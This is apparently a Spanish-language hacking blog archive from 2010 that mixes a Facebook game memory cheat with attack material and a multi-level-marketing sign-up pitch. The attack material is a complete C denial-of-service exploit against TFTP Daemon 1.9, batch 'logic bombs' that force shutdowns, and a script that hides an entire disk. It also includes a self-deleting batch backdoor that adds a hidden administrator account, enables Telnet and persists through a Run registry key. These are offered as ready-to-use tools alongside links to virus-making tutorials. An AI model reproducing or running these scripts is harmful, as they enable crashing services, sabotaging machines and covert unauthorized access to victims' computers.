26 de junio de 2010

Hack de Pet Society Para Ser Nivel 47

Hola! Aca Les Dejo Este Post Que Es Sobre Pet Society De Facebook!

Es Bastante Fácil . Traten De Seguir Todos Los Pasos Con Paciencia Y Llegaran Al Resultado !!

1. Abren Pet Society y cheat engine
2. Programan cheat engine de la sig. manera:
Marcamos la casilla Hex
En value tipe seleccionamos 8 bytes
Marcamos la casilla ASROM (Also scan read-only memory)
En process list seleccionamos el navegador que estamos usando
3. Debemos jugar con la pelota hasta hacer 5 toques.
4. Una vez que terminemos los 5 toques dejamos caer la pelota.
5. En el cheat engine en hex ponemos el sig. codigo: 544F8BD18B01C083
6. Nos aparecera dos resultados en la lista izquierda.
7. Hacemos click derecho en el segundo resultado y seleccionamos Disassemble this memory region.
8. En el primer codigo que tenemos seleccionado (por defecto) le hacemos click derecho y seleccionamos Change register at this location.
9. Marcamos la casilla EAX, ponemos 01000000 y luego OK.
8. Ahora vamos a jugar de nuevo con la pelota y hagan solamente 1 toque y dejen caer a la pelota.
9. Ya se darán cuenta que su experiencia y sus coins han cambiado.
10. Le apareceran varios cuadritos ponganle ok a todos

Ya Son Nivel 47 Disfrutenlo !!!!

24 de junio de 2010

Remote Buffer Overflow Exploit (TFTP Daemon Version 1.9) by Socket_0x03

//################################################
//
//Vulnerability: Remote Buffer Overflow Exploit
//Impact: Remote Denial of Service Attack
//Vulnerable Application: TFTP Daemon Version 1.9
//Tested on Windows XP Service Pack II
//
//Author: Socket_0x03
//Contact: Socket_0x03 (at) teraexe (dot) com
//Website: www.teraexe.com
//
//################################################

#include
#include

#pragma comment(lib, "ws2_32.lib")

char Buffer_Overflow[] =
"\x00\x02"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" // A = 41. 300 bytes...
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\0"
"netascii"
"\0";

void main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
SOCKET mysocket;
int destPORT = 69;

if (argc < 2){
printf("\nVulnerability: Remote Buffer Overflow Exploit\n");
printf("Impact: Remote Denial of Service Attack\n");
printf("Vulnerable Application: TFTP Daemon Version 1.9\n");
printf("\nAuthor: Socket_0x03\n");
printf("Contact: Socket_0x03 (at) teraexe (dot) com\n");
printf("Website: www.teraexe.com");
printf("\nUsage: exploit + 1 + IP Address\n");
printf("Example: exploit 1 192.168.1.100\n");
return;
}

wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) {
printf("No winsock suitable version found!");
return;
}
mysocket = socket(AF_INET, SOCK_DGRAM , 0);
if(mysocket==INVALID_SOCKET){
printf("Error: Cannot create a socket.\n");
exit(1);
}
printf("Resolving IP Address.\n");
if ((pTarget = gethostbyname(argv[2])) == NULL){
printf("Error: Resolve of %s failed.\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons(destPORT);

printf("Connecting to Daemon 1.9\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
printf("Error: Could not connect to TFTP Daemon\n");
exit(1);
}

printf("Connection Completed.\n");
Sleep(10);

printf("Sending packet.\n");
if (send(mysocket,Buffer_Overflow, sizeof(Buffer_Overflow)+1, 0) == -1){
printf("Error sending packet.\n");
closesocket(mysocket);
exit(1);
}
printf("Remote Buffer Overflow Completed.\n");

closesocket(mysocket);
WSACleanup();
}

/*
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>exploit

Vulnerability: Remote Buffer Overflow Exploit
Impact: Remote Denial of Service Attack
Vulnerable Application: TFTP Daemon Version 1.9

Author: Socket_0x03
Contact: Socket_0x03 (at) teraexe (dot) com
Website: www.teraexe.com

Usage: exploit + 1 + IP Address
Example: exploit 1 192.168.1.100

C:\>exploit 1 192.168.1.101
Resolving IP Address.
Connecting to Daemon 1.9
Connection Completed.
Sending packet.
Remote Buffer Overflow Completed.

C:\>
*/

Fuente: www.securityfocus.com & www.govermentsecurity.org

Saber diferenciar entre un hacker y un lammer

1. Técnicas Lammers vs técnicas hackers

Técnicas Lamers:
Xploits
Mailers
Scams
Ingenieria Social
Phising

Técnicas hackers
Remote Command Execution
Format String Attacks
Buffer Overflow
SQL Injection
Cross-Site Scripting
Remote File Inclusion
Local File Inclusion

Nota: Un verdadero hacker no va a esperar a que la víctima haga algún movimiento como abrir un correo electrónico o clickear en un troyano para infiltrarse en una computadora.

1.1 La técnica del troyano

técnica del troyano lammer:
Cuando un lammer quiere ejecutar un troyano en la computadora de su víctima, usualmente empieza a mandar Xploits por hotmail esperando a que la víctima abra el correo y le de doble click en un .exe

Técnica del troyano hacker:
Después de usar un exploit remoto y obtener la shell de la computadora en donde se quiere infiltrar, este usa un servidor TFTP o FTP para así pasar el troyano a la otra computadora y el mismo hacker lo ejecuta en esa computadora sin que la víctima tenga que hacer algún movimiento en su computadora.

2. Programación lammer vs Programación hacker

Programación lammer:
Una forma de identificar a un lammer, es cuando le preguntas que lenguaje de programación sabe, usualmente responden Batch, HTML y VB.
Batch (en realidad no es un lenguaje de programación)
HTML (en realidad no es un lenguaje de programación)
Visual Basic (Camino facil y esta limitado)
Nota: En la mayoría de los casos los lammers afirman que saben programar en Batch y HTML. Sin embargo, batch no es un lenguaje de programación ya que solamente cargan los comandos del MS-DOS o consola. HTML tampoco es un lenguaje de programación ya que solamente es un lenguaje de marcación. VB no es que sea un lenguaje de lammers, pero muchas veces podemos identificar a los lammers cuando afirman que solamente saben Batch, HTML y VB.

Programación hacker:
C/C++/VC++
Java
PHP (usandolo con la DB MySQL)
Perl
ASM (efectivo en shellcodes)

3. Propósitos lammers vs propósitos hackers

Lammer:
obtener passwords de hotmail
obtener passwords de MSN
Defacear X web porque el admin lo baneo
autodenominarse hacker con programas de terceros
En algunos casos no les interesa la programación.

Hackers:
expandir sus conocimientos informáticos y tecnológicos
crear aplicaciones que ayuden en los avances informáticos
encontrar vulnerabilidades y repararlas
desarrollar softwares como exploits o escaneadores

4. Deface lammer vs deface hacker

Lammer:
Después de realizar un deface lo más probable es que después de destruir todo coloque bien en grande "Hackeado por X" o "hacked by X" autodenominandose hacker y sin reportar la vulnerabilidad. "hacked" que significa "hackeado" son las acciones pasadas de un hacker, por lo tanto, el individuo se autodenomina hacker y seguramente no tiene un grado de conocimientos para serlo.

Hacker:
Después de realizar un deface sin destruir todo lo que ve, deja un mensaje con su correo electrónico para que el administrador pueda contactarlo y de esta forma el admin podrá ser notificado de la vulnerabilidad que se encuentra en su pagina web. En algunos casos, el webmaster también es informado sobre los métodos que debe aplicar para corregir el bug. También se presentan casos de que el hacker contacta con el administrador y antes de realizar el deface le dice que va a examinar las vulnerabilidades en sus servidores de forma que el webmaster esta al tanto antes de que se realice el deface y al mismo tiempo este termina con un sistema más seguro.

5. Datos sobre lammers vs datos sobre hackers

Lammers:
Generalmente, cuando googleamos, podemos darnos cuenta de los lammers que rondan por la red mediante las comunidades o las noticias... Usualmente los lammers por su bajo conocimiento en el campo de la seguridad informática, son capturados constantemente por agentes federales, policías y otros administradores de seguridad. Luego aparecen en las noticias como "hackers" pero en el 99 por ciento de los casos son lammers, el otro 1 por ciento pertenece a novatos o informáticos... Los hackers conocen muy bien el campo de la seguridad informática como para dejarse capturar, usualmente estos se mueven por la sombra y pasan desapercibidos...
En la parte de las comunidades, los lammers no han creado nada importante, usualmente viven usando softwares creados por tercero como hacen los script kiddies y al mismo tiempo realizando preguntas lammers en foros, también no suelen tener un website en donde muestren sus creaciones.

hackers:
Generalmente, cuando googleamos, podemos darnos cuenta de los hackers que rondan por la red mediante las comunidades o las noticias... Los verdaderos hackers no van a aparecer en las noticias como que fueron capturados por hacer algo ilegal ya que tienen la habilidad para no caer en eso... Podemos darnos cuenta de los hackers mediante los proyectos que hayan creado, por ejemplo, si visitamos las comunidades como Security-Focus, Offensive-Security (exploit-db) o Milw0rm podemos encontrar proyectos de verdaderos hackers como exploits remotos, shellcodes y tutoriales... Estos, usualmente tienen un website en donde colocan sus creaciones como aquellos softwares que han programado, tutoriales, guías en PDF y más.

Author: Josemanu9663

Guia Para Crear Bombas Logicas En Batch

Esta es una guia para novatos asi que solo voy a explicar la base de como crear las bombas logicas en batch y algunas cosas que se deben saber...

bombas de tiempo:se activan en fechas particulares o un número determinado de veces
bombas logicas:se activan cuando la computadora cumple una serie de requisitos especificados por su programador (ej:teclado,instalacion o inicio de sesion)

Que lenguaje de programacion usaremos?
ninguno ya que usaremos un archivo de procesamiento por lotes llamado batch (o .bat) este ya se encuentra en el sistema operativo de windows para eso creamos un bloc de notas (inicio,ejecutar y tecleas notepad.exe) colocas el codigo de la bomba y lo guardas en .bat (clip en archivo,guardar como,tecleas bomba.bat y clip en guardar)

Es batch un lenguaje de programacion?
no,ya que es un archivo de procesamiento por lotes que contiene un conjunto de comandos DOS

Sobre las tareas programadas:
Para programarle el tiempo a un archivo ve a panel de control,tareas programadas,agregar tarea programada,siguiente,examinar,seleccinas la localizacion del archivo,abrir,seleccionas cuando quiere que realice la tarea,siguiente,seleccionas la hora y la fecha,siguiente,colocas el nombre de usuario y contraseña y clip en finalizar (si te aparece un mensaje de error de 0x80070005:Acceso denegado es porque el nombre
de usuario y contraseña es incorrecto y el archivo no se ejecutara)...Ahora una bomba de tiempo no hay que hacerle todo ese proceso ya que eso va en su codigo sin necesidad de colocar nombre de usuario o password

sobre el DOS:como el batch usa los comandos del DOS puedes dejar tareas programadas desde el DOS (por si no quieres ejecutar el archivo en la pc de la victima) un ejemplo es ir al DOS (clip en inicio,ejecutar,tecleas cmd y clip en aceptar) y teclear: AT 18:40 msg * Esta es una prueba (asi le aparecera un mensaje a esa hora) aparte de eso puedes ver los comandos del DOS por ejemplo para ver el de las tareas programadas tecleas at/ para ver los comandos de shutdown tecleas shutdown (tecnica usada en la bomba 7)

configuraciones del reloj:en algunos casos las configuraciones del reloj en las computadoras son diferentes por ejemplo unas usan hora militar y otras usar am o pm en ese caso la bomba de tiempo tiene que ser configurada de acuerdo al tipo de hora de la computadora...

Ver el codigo de la bomba o editarlo:clip derecho a la bomba y luego editar

-------------------------------COMENZAMOS----------------------------------------------
Crea un un bloc de notas (inicio,ejecutar y tecleas notepad.exe) colocas el codigo de la bomba y lo guardas en .bat (clip en archivo,guardar como,tecleas bomba.bat y clip en guardar)

Codigos de las bombas:
1.Codigo de la bomba logica que apaga la computadora de la victima:
AT 18:43 SHUTDOWN -s -f -t 00

2.Codigo de la bomba logica que deja un mensaje a la victima:
AT 18:40 msg * Esta es una prueba

Curso batch completo para principiantes y avanzados gratis

HOLA A TODOS HE ESTADO BIENDO ALGUNOS

POST DEL CURSO BATCH YO LES TRAIGO ESTE Y MUCHO MAS POR E VISTO QUE VARIOS ANDAN INCOMPLETOS:


BUENO LES DEJO UN LINK PARA QUE DESCARGUEN

ALGO DE BATCH LA DESCARGA ES RAPIDA EN FORMATO "PDF"

CREO QUE ES MEJOR EN PDF:

LINK:
http://www.4shared.com/file/81180146/53890016/tutrorial_batch.html


curso batch para novatos desde 0..
tuto para crear tu primer virus
programacion avanzada
manual simple
pasar bat a .exe


LINK:
http://www.megaupload.com/?d=H08VC9OD

OCULTAR TODO EL DISCO DURO
COD:

echo off
cd\
attrib +h * /s /d

(Escribir en bloc de notas y guardar con la extensión .bat)
Como ya os podeis imaginar, ocultará todo el contenido del disco duro a menos que puedas ver todos los archivos ocultos en el panel de control. Además "Todos los programas" del menú Inicio se vaciará.
Ésta es la base, siempre podeís añadirle el siempre escalofriante mensaje: "C: deleted succesfully"

OK PARA LOS QUE ESTO ES FACIL Y QUIEREN

ALGO MAS AVANZADO AQUI ESTA EL LINK:


LINK:
http://www.mediafire.com/?zmnnnrmzmvz
ES PDF





Es un tutorial con imagenes, muy bien explicado, para este proceso se ha utilizado el codigo batch.
Fuente:icasoft.org
Autor:chinchano_1984


LINK:
http://rapidshare.com/files/291611245/Proteger.y.Ocultar.archivos.sin.uso.de.Software.rar

OCULTAR BAT EN UNA IMAGEN:

http://www.megaupload.com/?d=BS151GF5


ALGO PARA VUESTRO "USB" PONERLE NOMBRE ICONO FONDO ETC:
COD:

@echo off
title HaRrY USB
color a

set /p Mrobles=Aqui el nombre para tu USB
pause>nul
cls

set /p tuicono=Ahora el nombre del icono (sin el .ico)
pause>nul
cls

echo [AUTORUN]>>Autorun.inf
echo label=%Mrobles%>>Autorun.inf
echo icon=%tuicono%.ico>>Autorun.inf

cls

set /p dragonempires_1_1600x1200.jpg=Ahora pon el nombre de la imagen de fondo y la extension (ej:fondo.jpg)
pause>nul
cls

echo [ExtShellFolderViews]>>desktop.ini
echo {BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140- A513-11D0-A3A4-00C04FD706EC}>>desktop.ini
echo [{BE098140-A513-11D0-A3A4-00C04FD706EC}]>>desktop.ini
echo Attributes=1>>desktop.ini
echo IconArea_Image=%dragonempires_1_1600x1200.jpg%>>desktop.ini
echo IconArea_Text=0×00ffffff>>desktop.ini

cls
echo Ya tienes tus 2 documentos echos
echo ahora solo metelos junto con la imagen
echo del fondo y el icono y tendras tu USB TUNING XD
pause>nul
msg * By Harry
exit

MUY BIEN QUE LES PARECE TELNET MEDIANTE BATCH

VOY A DEJAR UN BATCH QUE SE ENCARGA QUE SE ENCARGA DE HABLILITAR EL SERVICIO TELNET


@echo off
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d %windir%\system32\yo.bat /f
pause
net user nombre pass /add
net localgroup "Administradores" nombre /add
pause
echo @echo off>>%windir%\system32\yo.bat
echo REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f>>%windir%\system32\yo.bat
echo REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d %windir%\system32\yo.bat /f>>%windir%\system32\yo.bat
echo net user nombre pass /add>>%windir%\system32\yo.bat
echo net localgroup "Administradores" nombre /add>>%windir%\system32\yo.bat
echo tlntadmn config port = 115>>%windir%\system32\yo.bat
echo exit>>%windir%\system32\yo.bat
pause
shutdown -r -t 00 -f -c "reiniciamos para efectuar cambios"
del %0
exit




ESPERO OS ALLA AYUDADO POR QUE ESTA BUENO TODO ESTO

SALUDOS Y CUIDENSE!!

15 de junio de 2010

Dominio y Hosting con Alertpay en Web4Africa


En Web4Africa puedes solicitar tu dominio y/o hosting a muy buen precio y pagar con alertpay, es una empresa rápida , segura y sencilla de manejar.
Entra aquí y solicita tu dominio .com .net .org ... ya!

14 de junio de 2010

Gana con Youniverse World - El Nuevo Mundo Virtual en 3D

Youniverse World es un gran Proyecto de Red Social en 3D, con fines de marketing, está en medios de comunicación. Es muy importante registrarse gratuitamente cuanto antes, debido a que obtendrás un buen posicionamiento y estarás en los primeros niveles de la matriz.

Ha sido diseñado por los Equipos de Linden Lab, los mismos creadores del famoso portal en 3 Dimensiones “Second Life”. En Youniverse World se comercializará productos de afiliados, Venta de productos, Comunicación, Juegos, Publicidad, Reuniones y Participaciones.
Este gran Proyecto nos traerá a todos nosotros Importantes Beneficios.

Es ideal para todo aquel emprendedor que trabaje por Internet sea cual sea su negocio.

Mira el siguiente video informativo de menos de 20 minutos, es una de las primeras conferencias sobre Youniverse World en la que se explican aspectos importantes sobre esta gran oportunidad.

Encuentra más vídeos como este en Youniverse World

Podremos presentar nuestros porductos en salas de conferencias virtual, videoconferencias, integrando nuestros propios videos, flash, diapositivas, etc…

Youniverse World también posee su propia economía… Puntos de Volumen (SV) se aplicarán sobre todos los intercambios comerciales, internos, compras, ventas, servicios, etc. Un 70% de los volúmenes de operaciones comerciales realizadas se redistribuirán entre los ciudadanos que podremos convertirlos en las monedas respectivas de nuestros países para poder cobrar.

Las posibilidades son muy grandes, este proyecto esta respaldado por una empresa que cuenta con más de 20 Billones de dólares y se prevee que seamos más de 50 millones de personas las que habitemos en este nuevo Mundo Virtual.

El Registro es totalmente GRATUITO. Posicionarse ahora es esencial (si lo enfocas cómo una oportunidad de negocio), ya que vas a ganar de nueve niveles de matriz y podrás tener tantos directos como quieras, no dejes que otros se te adelanten y posicionen a tus contactos en sus matrices.

Para inscribirte necesariamente deberás tener un Tutor, en este caso yo, que te guiaré e informaré de todo lo relacionado con YouniverseWorld, llena tus datos en el siguiente formulario y obtendrás noticias sobre las próximas conferencias online y valiosa información directamente en tu correo electrónico. Pronto me estaré comunicando.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
Para inscribirte directamente ingresa a: youniverseworld.com
Das click en ENTER, llenas tus datos (telefono con codigo de pais)
En el siguiente paso inseta mi ID de contrato: 135842 para que pueda ser tu tutor y presionas Encontrar Tutor, luego presiona en Continuar para crear tu cuenta, por último crea una Contraseña, acepta todos los términos y revisa en tu correo, Youniverse World te enviará los correos electrónicos de ACTIVACIÓN y acceso a su Oficina Virtual.

Archivo del blog

Nuestra Musica


MusicPlaylistRingtones
Create a playlist at MixPod.com